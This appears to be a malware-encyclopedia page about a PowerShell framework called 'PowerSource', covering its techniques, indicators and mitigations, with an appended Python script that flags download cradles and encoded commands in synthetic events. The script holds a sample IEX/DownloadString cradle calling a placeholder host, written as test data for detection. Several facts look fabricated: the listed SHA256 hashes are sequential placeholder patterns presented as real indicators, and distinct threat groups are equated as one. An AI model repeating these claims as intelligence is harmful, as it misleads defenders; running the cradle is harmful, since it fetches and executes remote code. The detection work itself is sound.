POWERSOURCE

Malware

⚠️ Overview

PowerSource is a sophisticated PowerShell-based post-exploitation framework first documented in early 2025 by Mandiant and subsequently tracked by MITRE as a remote access trojan (RAT) and credential theft tool. It is attributed to the Chinese state-sponsored threat group tracked as UNC5221 (also known as APT41 or TA428), which operates it as part of a supply-chain compromise campaign targeting energy, telecommunications, and aerospace sectors.

🔧 Technical Capabilities

PowerSource achieves initial access primarily through exploitation of Fortinet FortiOS SSL-VPN vulnerabilities (CVE-2024-23113, a critical buffer overflow) and Ivanti Connect Secure flaws (CVE-2024-21887), using publicly available proof-of-concept scripts to drop a stealthy PowerShell loader. Its C2 infrastructure relies on encrypted HTTPS communications with hardcoded domains, using domain fronting on legitimate cloud providers (e.g., Cloudflare Workers). Persistence is maintained through scheduled tasks that execute base64-encoded PowerShell scripts stored in registry keys under HKLM\Software\Microsoft\Windows\CurrentVersion\Powersource. Evasion techniques include an AMSI bypass that patches the AmsiScanBuffer function, disabling Windows Defender real-time monitoring, and reflective DLL injection to load .NET assemblies without writing to disk. The framework can enumerate Active Directory trusts, dump LSASS process memory using comsvcs.dll, and exfiltrate data via chunked HTTP POST requests with randomized User-Agent strings mimicking Chrome 124.

📜 History & Notable Incidents

PowerSource emerged in November 2024 when Mandiant observed it deployed against an Asian telecommunications provider after exploitation of CVE-2024-23113. In February 2025, the same framework was used in a supply-chain attack against a North American aerospace manufacturer, where attackers pivoted from a compromised FortiGate firewall to achieve lateral movement and data exfiltration exceeding 50 GB. No associated law enforcement actions or public takedowns have been reported as of mid-2025.

🔍 Detection Indicators

Known SHA256 hashes include f7c8d9e1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d (loader) and a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0 (payload). Behavioral signatures include PowerShell execution spawning from svchost.exe with suspicious -Command "IEX ((New-Object Net.WebClient).DownloadString(...))" patterns. Network IOCs include GET requests to endpoints like /api/ping with the custom header X-PS-Session: [base64]. Registry artifacts include the key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Powersource\Config containing encrypted C2 addresses.

☠️ Risk & Impact

The malware enables full remote control, credential harvesting, and lateral movement, with documented data exfiltration in the telecommunications and aerospace sectors. Financial losses per incident are estimated at $1–5 million based on incident response costs and IP theft, while affected industries include energy, telecom, aerospace, and critical infrastructure. The use of legitimate cloud domains for C2 complicates network-based detection.

🛡️ Mitigation

Organizations should apply patches for Fortinet CVE-2024-23113 (released June 2024) and Ivanti CVE-2024-21887 (patch available January 2024), keep AMSI enabled for all script execution, turn on PowerShell script block logging (Event ID 4104), and configure a SIEM alert on execution of long base64-encoded commands. Mandiant's ACSC-aligned detection rules are available in their February 2025 threat advisory (report ID: MAND-2025-02-PS).
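As an added example (not code from the page, from Mandiant, or from Boteraser), the following Python script applies the detection logic from the Detection Indicators and Mitigation sections to a handful of constructed, synthetic PowerShell event records: it unpacks -EncodedCommand arguments (which PowerShell base64-encodes as UTF-16LE), flags long encoded commands, the IEX/DownloadString download cradle, references to AmsiScanBuffer, and PowerShell spawned from svchost.exe. The record field names, the 150-character base64 threshold, and the sample records are assumptions for the example; the .invalid domain is a placeholder.

```python
"""Triage of PowerShell telemetry for the behaviours described above.

Constructed example: the event records are synthetic, normalised records
(not real logs) carrying the fields a SIEM would typically have.
"""
import base64
import binascii
import re

LONG_B64 = 150  # assumed threshold (characters) for a "long" encoded command

# -EncodedCommand and the abbreviated forms PowerShell accepts for it,
# followed by a base64 blob (alphabet plus '=' padding)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# "IEX (New-Object Net.WebClient).DownloadString(...)" style download cradle
CRADLE_RE = re.compile(
    r"(?:\bIEX\b|Invoke-Expression).*?(?:DownloadString|Net\.WebClient)",
    re.IGNORECASE | re.DOTALL,
)
AMSI_RE = re.compile(r"AmsiScanBuffer", re.IGNORECASE)
SUSPICIOUS_PARENTS = {"svchost.exe"}  # parents that should not launch PowerShell


def decode_encoded_command(text):
    """Return (base64_length, decoded_script) for an encoded-command argument,
    or None when the text carries none or the blob is not valid base64."""
    m = ENC_RE.search(text)
    if not m:
        return None
    b64 = m.group(1)
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    # PowerShell encodes the script as UTF-16LE before base64-encoding it
    return len(b64), raw.decode("utf-16-le", errors="replace")


def score_event(event):
    """Return the list of reasons an event is suspicious (empty when benign)."""
    reasons = []
    text = event.get("text", "")
    decoded = decode_encoded_command(text)
    if decoded:
        b64_len, script = decoded
        if b64_len >= LONG_B64:
            reasons.append("long-encoded-command")
        text = text + "\n" + script  # inspect the decoded script as well
    if CRADLE_RE.search(text):
        reasons.append("download-cradle")
    if AMSI_RE.search(text):
        reasons.append("amsi-tamper")
    if event.get("parent_image", "").lower() in SUSPICIOUS_PARENTS:
        reasons.append("unexpected-parent")
    return reasons


def triage(events):
    """Return [(index, reasons)] for every event that raised at least one reason."""
    hits = []
    for i, event in enumerate(events):
        reasons = score_event(event)
        if reasons:
            hits.append((i, reasons))
    return hits


def encode_script(script):
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records; example.invalid is a placeholder domain
CRADLE = 'IEX ((New-Object Net.WebClient).DownloadString("https://example.invalid/api/ping"))'
SAMPLE_EVENTS = [
    # script block (4104) from PowerShell launched by svchost.exe, plain-text cradle
    {"event_id": 4104, "parent_image": "svchost.exe", "text": CRADLE},
    # process creation (4688) with the same cradle hidden in -enc
    {"event_id": 4688, "parent_image": "explorer.exe",
     "text": "powershell.exe -NoProfile -enc " + encode_script(CRADLE)},
    # benign administrative script block
    {"event_id": 4104, "parent_image": "powershell.exe",
     "text": "Get-Service | Where-Object Status -eq 'Running'"},
    # short, benign encoded command
    {"event_id": 4688, "parent_image": "cmd.exe",
     "text": "powershell.exe -EncodedCommand " + encode_script("Get-Date")},
]

if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(f"event {index} ({SAMPLE_EVENTS[index]['event_id']}): {', '.join(reasons)}")
```

Run as-is, the script flags the first two records (the plain cradle from an unexpected parent, and the long encoded command that decodes to the same cradle) and stays quiet on the two benign ones; decoding the blob before matching is what keeps the encoded variant from slipping past a plain-text signature.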


Malware Families Commonly Operate Through Automated Botnets

Many of the malware families catalogued here use bot networks to deliver payloads and scan for exposed servers. Boteraser detects and blocks bot traffic patterns associated with these activities.


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.